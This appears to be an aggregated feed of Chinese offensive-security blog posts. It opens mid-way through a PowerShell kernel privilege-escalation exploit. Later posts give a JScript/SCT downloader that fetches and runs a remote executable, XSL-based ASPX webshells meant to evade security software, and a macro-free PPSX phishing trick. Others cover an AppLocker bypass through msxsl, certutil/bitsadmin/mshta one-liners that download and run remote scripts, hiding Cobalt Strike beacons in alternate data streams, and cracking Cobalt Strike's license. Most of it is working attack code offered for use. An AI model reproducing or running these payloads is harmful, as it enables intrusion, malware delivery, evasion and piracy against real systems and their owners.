            $Pointer1 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $LoopCount + 16)
            $Pointer2 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $LoopCount + 24)
            if ($Pointer1 -eq $Pointer2) {
                $BufferOffset = $LoopCount + 16
                Break
            }
        }
        $LoopCount += 8
    } while ($LoopCount -lt 0x2000)
    $pvBits = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $BufferOffset)
    $pvScan0 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $BufferOffset + 8)
    
    # Sanity check, probably unnecessary
    if ($pvScan0 -ne 0) {
        echo "`n[?] Success, reading beyond worker bitmap size!"
        echo "[+] Old manager bitmap pvScan0: $('{0:X}' -f $pvScan0)"
    } else {
        echo "`n[!] Buffer contains invalid data, quitting..`n"
        Return
    }
    
    # Overwrite pointers in buffer
    [System.Runtime.InteropServices.Marshal]::WriteInt64($($BytePointer.ToInt64() + $BufferOffset),$WorkerBitmap.BitmappvScan0)
    [System.Runtime.InteropServices.Marshal]::WriteInt64($($BytePointer.ToInt64() + $BufferOffset + 8),$WorkerBitmap.BitmappvScan0)
    $pvScan0 = [System.Runtime.InteropServices.Marshal]::ReadInt64($BytePointer.ToInt64() + $BufferOffset + 8)
    echo "[+] New manager bitmap pvScan0: $('{0:X}' -f $pvScan0)"
    
    # Overwrite adjacent kernel _SURFOBJ
    $CallResult = [ms16135]::SetBitmapBits($WorkerBitmap.BitmapHandle,0x2000,$BytePointer)
    
    #==============================================================[Elevate]
    Bitmap-Elevate -ManagerBitmap $ManagerBitmap.BitmapHandle -WorkerBitmap $WorkerBitmap.BitmapHandle
    if([String]::IsNullOrEmpty($Application))
    {
    Write-Host "[!] Nothing to do.."  
    }
    else{cmd /c $Application + " " + $Commandline}
    
    }
    

    github地址:戳我
    demo:

    1.gif


    0 0
  • 05/06/17--05:27: JS下载者 (chan 69772723)
  • var WSHShell = new ActiveXObject("WScript.Shell");
                path = WSHShell.ExpandEnvironmentStrings("%temp%");
                var filepath = path+"/explorer.exe";
                var xhr = new ActiveXObject("MSXML2.XMLHTTP");
                xhr.open("GET","http://x.x.x.x/bd.exe", false);
                xhr.send();
                if (xhr.Status == 200) {
                    var fso = new ActiveXObject("Scripting.FileSystemObject");
                    var stream = new ActiveXObject("ADODB.Stream");
                    stream.Open();
                    stream.Type = 1;
                    stream.Write(xhr.ResponseBody);
                    stream.Position = 0;
                    if (fso.FileExists(filepath)){
                       fso.DeleteFile(filepath);
                    }
                    stream.SaveToFile(filepath);
                    stream.Close();
                    new ActiveXObject("WScript.Shell").Exec(filepath);
                }
    

    SCT:

    <?XML version="1.0"?>
    <scriptlet>
    <registration
        progid="ShortJSRAT"
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
        <!-- Learn from Casey Smith @subTee -->
        <script language="JScript">
            <![CDATA[
                var WSHShell = new ActiveXObject("WScript.Shell");
                path = WSHShell.ExpandEnvironmentStrings("%temp%");
                var filepath = path+"/explorer.exe";
                var xhr = new ActiveXObject("MSXML2.XMLHTTP");
                xhr.open("GET","http://x.x.x.x/bd.exe", false);
                xhr.send();
                if (xhr.Status == 200) {
                    var fso = new ActiveXObject("Scripting.FileSystemObject");
                    var stream = new ActiveXObject("ADODB.Stream");
                    stream.Open();
                    stream.Type = 1;
                    stream.Write(xhr.ResponseBody);
                    stream.Position = 0;
                    if (fso.FileExists(filepath)){
                       fso.DeleteFile(filepath);
                    }
                    stream.SaveToFile(filepath);
                    stream.Close();
                    new ActiveXObject("WScript.Shell").Exec(filepath);
                }
    
    
            ]]>
    </script>
    </registration>
    </scriptlet>
    

    0 0
  • 05/13/17--05:45: Xsl Exec Webshell (aspx) (chan 69772723)
  • 关于使用xsl的webshell以前已经有人发过了,比如aspx的一个webshell如下:

    <%@ Page Language="C#" Debug="true" %>
    <%@ import Namespace="System.IO"%>
    <%@ import Namespace="System.Xml"%>
    <%@ import Namespace="System.Xml.Xsl"%>
    <%
    string xml=@"<?xml version=""1.0""?><root>test</root>";
    string xslt=@"<?xml version='1.0'?>
    <xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
        <msxsl:script language=""JScript"" implements-prefix=""zcg"">
            <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
            <msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
            <msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
            <msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
            <![CDATA[function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}]]>
        </msxsl:script>
    <xsl:template match=""/root"">
        <xsl:value-of select=""zcg:xml()""/>
    </xsl:template>
    </xsl:stylesheet>";
    XmlDocument xmldoc=new XmlDocument();
    xmldoc.LoadXml(xml);
    XmlDocument xsldoc=new XmlDocument();
    xsldoc.LoadXml(xslt);
    XslCompiledTransform xct=new XslCompiledTransform();
    xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
    xct.Transform(xmldoc,null,new MemoryStream());
    
    %>
    

    密码为 a,这个webshell是可以用菜刀连接的,测试碰到这种情况:服务器有安全狗等防护软件,提交的各种数据包可能会拦截,而现在想要做的就是执行命令就可以了,为了方便,写了一个命令执行的webshell,可回显,可改密码,具体代码如下:

    <%@page language="C#"%>
    <%@ import Namespace="System.IO"%>
    <%@ import Namespace="System.Xml"%>
    <%@ import Namespace="System.Xml.Xsl"%>
    <%
    string xml=@"<?xml version=""1.0""?><root>test</root>";
    string xslt=@"<?xml version='1.0'?>
    <xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
        <msxsl:script language=""JScript"" implements-prefix=""zcg"">
        <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
        <msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
        <msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
        <msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
            <![CDATA[function xml(){
            var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;
            var command = Request.Item['cmd'];
            var r = new ActiveXObject(""WScript.Shell"").Exec(""cmd /c ""+command);
            var OutStream = r.StdOut;
            var Str = """";
            while (!OutStream.atEndOfStream) {
                Str = Str + OutStream.readAll();
                }
            Response.Write(""<pre>""+Str+""</pre>"");
            }]]>
        </msxsl:script>
    <xsl:template match=""/root"">
        <xsl:value-of select=""zcg:xml()""/>
    </xsl:template>
    </xsl:stylesheet>";
    XmlDocument xmldoc=new XmlDocument();
    xmldoc.LoadXml(xml);
    XmlDocument xsldoc=new XmlDocument();
    xsldoc.LoadXml(xslt);
    XsltSettings xslt_settings = new XsltSettings(false, true);
    xslt_settings.EnableScript = true;
    try{
        XslCompiledTransform xct=new XslCompiledTransform();
        xct.Load(xsldoc,xslt_settings,new XmlUrlResolver());
        xct.Transform(xmldoc,null,new MemoryStream());
    }
    catch (Exception e){
        Response.Write("Error");
    }
    %>
    

    密码为cmd,可自己改,测试如下图:

    123.png

    附带一个大马里面的命令执行:

    <%@ Page Language="VB" Debug="true" %>
    <%@ import Namespace="system.IO" %>
    <%@ import Namespace="System.Diagnostics" %>
    
    <script runat="server">      
    
    Sub RunCmd(Src As Object, E As EventArgs)            
      Dim myProcess As New Process()            
      Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            
      myProcessStartInfo.UseShellExecute = false            
      myProcessStartInfo.RedirectStandardOutput = true            
      myProcess.StartInfo = myProcessStartInfo            
      myProcessStartInfo.Arguments=xcmd.text            
      myProcess.Start()            
    
      Dim myStreamReader As StreamReader = myProcess.StandardOutput            
      Dim myString As String = myStreamReader.Readtoend()            
      myProcess.Close()            
      mystring=replace(mystring,"<","&lt;")            
      mystring=replace(mystring,">","&gt;")            
      result.text= vbcrlf & "<pre>" & mystring & "</pre>"    
    End Sub
    
    </script>
    
    <html>
    <body>    
    <form runat="server">        
    <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>        
    <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>        
    <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>        
    <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>        
    <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>        
    <p><asp:Label id="result" runat="server"></asp:Label>       
    </form>
    </body>
    </html>
    


    0 0
  • 05/18/17--19:39: 前端黑在线工具 XSS’OR (chan 69772724)
  • 这是一个在线免费的前端黑工具,目前主要包含 3 大模块: 1. Encode/Decode 加解密模块,包含: […]

    0 0
  • 06/20/17--23:41: 构造PPSX钓鱼文件 (chan 69772723)
  • 之前出现了一种新型的钓鱼攻击的手法,即通过PPT在未开启宏的情况下,执行程序,关于这个Freebuf也有相关文章进行介绍,《新型PPT钓鱼攻击分析》《无需宏,PPT也能用来投递恶意程序》。但是文中都未介绍怎么制作这种文件,所以,今天在这里分享一下制作该文件的方法,希望大家了解并对此进行防御。

    首先,创建一个普通的PPTX文件,随便填入一些内容,如下图:
    1.png

    之后插入一个动作按钮,具体位置如下图:
    2.png

    这里要选择空白的那个,选择以后,在页面中拉出一个触发位置,之后会弹出动作设置的界面:
    3.png

    选择鼠标移过->运行程序:
    4.png

    选择要运行的程序可在后面直接加参数,如计算器,之后点击确定。
    5.png
    现在显示为一个有色区域,所以要对他进行设置,右键->设置形状格式,将填充和线条颜色改成无
    6.png

    最后将文件保存为PPSX文件即可。

    最终效果:

    2.gif


    0 0

    XSS’OR 开源了。采用 BSD 开源协议,很宽松,不限制传播与商业化,留下作者版权就好。在下面 […]

    0 0
  • 07/07/17--00:28: Bypass AppLocker With MSXSL.EXE (chan 69772723)
  • 关于XSLT之前已经有几篇文章进行介绍了,Hack With XSLTXXE with XSLXsl Exec Webshell ,今天分享一个通过MSXSL.exe绕过Applocker的方法。
    msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。下载地址为:戳我

    msxsl.exe 需要接受两个文件,XML及XSL文件,命令行操作如下:

    msxsl.exe demo.xml exec.xsl
    

    demo.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    exec.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
     
    <msxsl:script language="JScript" implements-prefix="user">
       function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
       return nodelist.nextNode().xml;
     
       }
    </msxsl:script>
    <xsl:template match="/">
       <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    1.gif

    同样的,msxsl.exe可以远程加载,具体方式如下:

    msxsl https://evi1cg.me/scripts/demo.xml https://evi1cg.me/scripts/exec.xsl
    

    0 0
  • 07/24/17--01:59: powershell 通过IE下载文件 (chan 69772723)
  • $ie = New-Object -Com internetExplorer.Application
    $ie.Navigate("https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe")
    
    #------------------------------
    #Wait for Download Dialog box to pop up
    Sleep 5
    while($ie.Busy){Sleep 1}
    #------------------------------
    
    #Hit "S" on the keyboard to hit the "Save" button on the download box
    $obj = new-object -com WScript.Shell
    $obj.AppActivate('Internet Explorer')
    $obj.SendKeys('s')
    
    #Hit "Enter" to save the file
    $obj.SendKeys('{Enter}')
    
    #Closes IE Downloads window
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{TAB}')
    $obj.SendKeys('{Enter}')
    
    

    原文:戳我


    0 0
  • 08/03/17--18:25: Some Tricks (chan 69772723)
  • 远程执行sct的另一种姿势

    cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
    

    detail:https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd

    命令行下载姿势1

    bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip
    bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\p.zip
    bitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:\p.zip"
    

    命令行下载姿势2

    certutil -urlcache -split -f http://192.168.254.102:80/a.txt b.txt
    

    清除缓存 certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete

    命令行执行远程JS

    certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete
    

    命令行远程执行VBS

    certutil -urlcache -split -f http://192.168.254.102:80/abc a.vbs && cscript a.vbs &&  del a.vbs && certutil -urlcache -split -f http://192.168.254.102:80/abc delete
    

    命令行远程执行HTA

    mshta http://192.168.254.102/1.hta
    

    0 0
  • 08/31/17--19:23: 渗透中的ADS (chan 69772723)
  • 为了测试,在这里使用Cobaltstrike 生成一个exe,用来查看文件是否上传成功,并可以顺利执行,每次上传文件以后,服务器自动删除,如下图:
    1504229593529.png

    PS: meterpreter会话是通过powershell web_delivery获取的

    尝试创建文件夹成功:
    1504229703126.png

    将文件上传至特殊目录:

    upload /tmp/beacon.exe \\\\.\\c:\\WINDOWS\\debug\\WIA\\123:aa.exe
    

    upload /tmp/beacon.exe 123:aa.exe也可以,这是写到了当前目录。

    上传以后进入shell 可使用 dir /r来查看
    1504229856372.png

    可以看到成功写入了,之后使用WMIC来执行,命令如下:

    wmic process call create \\.\c:\WINDOWS\debug\WIA\123:aa.exe
    wmic process call create C:\WINDOWS\debug\WIA\123:aa.exe //当前目录使用,需要绝对路径
    

    也可以使用msf来执行

    execute -cH -f "\\\\.\\c:\\WINDOWS\\debug\\WIA\\123:aa.exe"
    

    1504229982741.png

    到cobal里面可以看到会话。

    如果有权限的话,可使用certutil下载文件到ADS

    certutil -urlcache -split -f http://url/test.exe \\.\c:\WINDOWS\debug\WIA\123:aa.exe
    

    删除certutil缓存

    certutil.exe -urlcache -split -f http://url/test.exe delete
    

    测试时发现一个有趣的东西,使用test:
    1.gif

    使用nul
    test.gif

    测试发现,如果想要dir /s 里面看不到ADS,可以使用的文件为:

    \\.\C:\test\COM1
    \\.\C:\test\COM2
    ...
    \\.\C:\test\COM9
    \\.\C:\test\nul
    

    并且这些文件是不可以直接删除的,要删除的话使用如下命令:

    del \\.\C:\test\nul
    

    再分享一下怎么样带参数执行ADS文件,其实可以借助于MSF,具体命令如下

    execute -iH -f "c:\\文件路径\\123:1.exe" -a "文件参数"
    

    效果如下图:
    1504257989079.png

    使用msf删除ADS,可直接使用rm 加绝对路径即可,如下图:
    1504258209654.png


    0 0
  • 09/06/17--22:50: cobaltstrike3.8 破解版 (chan 69772723)
  • C568E2BB-3369-4EB1-993A-EBEA12790162.png
    之前一直想下载3.8,但是没下载到,看到小伙伴留言发了一个试用版的链接(安全性未知)。
    B49E21D6-8C9D-405B-AA10-B0B3B3275F95.png

    链接:https://f001.backblazeb2.com/file/thedarkcloud/cobaltstrike/cobaltstrike-trial.tgz

    然后就下载了一下,发现这个并不是破解版。如下图:
    E0C37677-323F-4D1A-A00D-0CC6068D73A1.png

    所以就对其进行了简单的修改,并把方法分享给大家,以便大家使用。
    首先,对cobaltstrike.jar进行解压,解压以后找到common\License.class,使用jad进行反编译。

    C:\Users\evi1cg\Desktop\jad>jad License.class
    Parsing License.class... Generating License.jad
    

    之后编辑License.jad文件,修改以下参数。找到life,修改为65535L:

    4E7F56F9-72A6-4038-BAD5-778BC8FAF54C.png

    之后将License.jad重命名为License.java,置于解压以后的CobaltStrike的根目录,之后使用javac进行编译。

    javac -classpath . License.java
    

    编译以后得到License.class,使用winrar打开未解压的CobaltStrike,使用修改后的License.class替换原来的License.class即可。

    如果不想打开的时候弹框,可使用以下License.java进行编译

    package common;
    
    import aggressor.Prefs;
    
    public class License
    {
    
        public License()
        {
        }
    
        private static long getTimeSinceStart()
        {
            Prefs prefs = Prefs.getPreferences();
            today = System.currentTimeMillis();
            start = prefs.getLongNumber("cobaltstrike.start.int", 0L);
            if(start == 0L)
            {
                prefs.set("cobaltstrike.start.int", (new StringBuilder()).append("").append(today).append("").toString());
                prefs.save();
                start = today;
            }
            difference = (today - start) / 0x5265c00L;
            return difference;
        }
    
        public static void checkLicenseGUI()
        {
            getTimeSinceStart();
        }
    
        public static boolean isTrial()
        {
            return true;
        }
    
        public static void checkLicenseConsole()
        {
        }
    
        private static long life = 65535L;
        private static long today = 0L;
        private static long start = 0L;
        private static long difference = 0L;
    
    }
    

    在这里有个坑,参照这个文章进行破解是有问题的,他直接修改了common.License.isTrial()的返回值为flase。

    public static boolean isTrial()
      {
        return true;
        // 必须修改函数
        // return false; //edit here
      }
    

    导致在ArtifactUtils类中处理函数XorEncode直接走向payload的Encode。

        public static byte[] XorEncode(byte data[], String arch)
        {
            if(License.isTrial())
            {
                CommonUtils.print_trial((new StringBuilder()).append("Disabled ").append(arch).append(" payload stage encoding.").toString());
                return data;
            }
            AssertUtils.Test(data.length > 16384, "XorEncode used on a stager (or some other small thing)");
            AssertUtils.TestArch(arch);
            if("x86".equals(arch))
            {
                byte decoder[] = CommonUtils.pickOption("resources/xor.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            }
            if("x64".equals(arch))
            {
                byte decoder[] = CommonUtils.readResource("resources/xor64.bin");
                byte payload[] = XorEncoder.encode(data);
                return CommonUtils.join(decoder, payload);
            } else
            {
                return new byte[0];
            }
        }
    

    但是由于试用版不存在xor.bin以及xor64.bin,所以会导致无法创建监听。所以我们还是只改时间好了。然后我们的cs就可以使用了,缺点就是不能加密payload。

    5CE4860A-6B52-4E1F-A895-48EBFE03657F.png

    修改版下载链接: 链接: 戳我 密码: 86f3 安全性请自行验证!!